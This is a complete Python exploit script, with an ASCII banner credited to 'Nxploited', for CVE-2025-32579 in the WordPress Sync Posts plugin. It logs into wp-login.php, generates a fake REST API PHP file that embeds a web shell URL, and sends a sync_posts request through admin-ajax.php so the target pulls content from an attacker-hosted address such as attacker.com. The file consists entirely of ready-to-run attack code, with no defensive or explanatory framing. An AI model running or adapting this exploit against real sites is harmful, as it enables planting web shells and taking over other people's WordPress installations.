README.md
Rendering markdown...
import argparse
import requests
import urllib.parse
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
def display_banner():
print("""
@@@ @@@ @@@ @@@ @@@@@@@ @@@ @@@@@@ @@@ @@@@@@@ @@@@@@@@ @@@@@@@
@@@@ @@@ @@@ @@@ @@@@@@@@ @@@ @@@@@@@@ @@@ @@@@@@@ @@@@@@@@ @@@@@@@@
@@!@!@@@ @@! !@@ @@! @@@ @@! @@! @@@ @@! @@! @@! @@! @@@
!@!!@!@! !@! @!! !@! @!@ !@! !@! @!@ !@! !@! !@! !@! @!@
@!@ !!@! !@@!@! @!@@!@! @!! @!@ !@! !!@ @!! @!!!:! @!@ !@!
!@! !!! @!!! !!@!!! !!! !@! !!! !!! !!! !!!!!: !@! !!!
!!: !!! !: :!! !!: !!: !!: !!! !!: !!: !!: !!: !!!
:!: !:! :!: !:! :!: :!: :!: !:! :!: :!: :!: :!: !:!
:: :: :: ::: :: :: :::: ::::: :: :: :: :: :::: :::: ::
:: : : :: : : :: : : : : : : : : :: :: :: : :
""")
def login_to_wordpress(url, username, password):
login_url = url.rstrip('/') + '/wp-login.php'
data = {
'log': username,
'pwd': password,
'rememberme': 'forever',
'wp-submit': 'Log In'
}
headers = {"User-Agent": user_agent}
print("NXPLOITED: Attempting login...")
resp = session.post(login_url, data=data, headers=headers)
if any('wordpress_logged_in' in c.name for c in session.cookies):
print("NXPLOITED: Logged in successfully.")
return True
else:
print("NXPLOITED: Failed to log in.")
return False
def generate_fake_api(shell_url):
return f"""<?php
header('Content-Type: application/json');
echo json_encode([
[
"id" => 1,
"title" => ["rendered" => "Nxploited"],
"content" => [
"rendered" => "<img src='{shell_url}'>"
]
]
]);
?>"""
def send_exploit_request(target_url, website_url):
data = {
"website_url": website_url,
"post_status": "pending",
"num_posts": 1,
"import_comments": 1,
"author": 1,
"action": "sync_posts"
}
headers = {
"User-Agent": user_agent,
"Accept": "text/html, */*; q=0.01",
"Accept-Language": "en-US,en;q=0.5",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Referer": f"{target_url}/wp-admin/admin.php?page=sync-posts",
"Origin": target_url,
"Connection": "keep-alive"
}
print(f"NXPLOITED: Sending exploit request to: {target_url}")
try:
response = session.post(
f"{target_url}/wp-admin/admin-ajax.php",
headers=headers,
data=urllib.parse.urlencode(data),
)
if response.status_code == 200:
print("NXPLOITED: Request sent successfully.")
print(response.text[:500])
else:
print(f"NXPLOITED: Failed to send request. Status: {response.status_code}")
print(response.text[:300])
except Exception as e:
print(f"NXPLOITED: Error occurred while sending request: {e}")
def main():
display_banner()
parser = argparse.ArgumentParser(description="Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://target.com/wordpress)")
parser.add_argument("-un", "--username", required=True, help="Username to login")
parser.add_argument("-p", "--password", required=True, help="Password to login")
parser.add_argument("-ws", "--website", required=True, help="URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)")
parser.add_argument("-shell", "--webshell", required=True, help="Web shell URL used inside the fake API (can be a test image)")
args = parser.parse_args()
php_api_content = generate_fake_api(args.webshell)
with open("Khaled_alenazi.php", "w") as f:
f.write(php_api_content)
print("NXPLOITED: Generated fake API PHP file: Khaled_alenazi.php")
if login_to_wordpress(args.url, args.username, args.password):
send_exploit_request(args.url, args.website)
else:
print("NXPLOITED: Exploit aborted due to failed login.")
if __name__ == "__main__":
main()